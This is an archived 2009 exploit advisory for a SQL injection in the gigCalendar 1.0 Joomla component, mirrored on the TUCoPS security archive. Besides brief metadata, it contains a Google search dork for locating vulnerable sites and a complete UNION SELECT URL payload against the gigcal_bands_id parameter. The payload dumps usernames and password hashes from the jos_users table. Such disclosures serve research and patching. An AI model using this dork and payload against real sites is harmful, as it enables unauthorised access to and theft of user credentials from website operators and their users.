TUCoPS :: HP Unsorted G :: va2673.htm

gigCalendar Joomla Component 1.0 SQL Injection
gigCalendar Joomla Component 1.0 SQL Injection
gigCalendar Joomla Component 1.0 SQL Injection


*******   Salvatore "drosophila" Fresta   *******


Application:	gigCalendar Joomla Component 1.0
http://joomlacode.org/gf/project/gigcalendar/ 
Version:		gigCalendar 1.0
Bug:         	* SQL Injection
Exploitation:	Remote
Dork:		inurl:"index.php?option=com_gigcal"
Date:         	21 Feb 2009
Discovered by:Salvatore "drosophila" Fresta
Author:       	Salvatore "drosophila" Fresta
e-mail: drosophilaxxx@gmail.com 
              	

*************************************************

- BUGS

SQL Injection:

	Requisites: magic_quotes_gpc = off

	File affected: banddetails.php

	This bug allows a guest to view username and
	password of a registered user.

http://www.site.com/path/index.php?option=com_gigcal&task=details&gigcal_bands_id=-1' 
UNION ALL SELECT 1,2,3,4,5,concat('username: ',
username),concat('password: ', password),NULL,NULL,NULL,NULL,NULL,NULL
from jos_users%23

*************************************************

-- 
Salvatore "drosophila" Fresta
CWNP444351

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH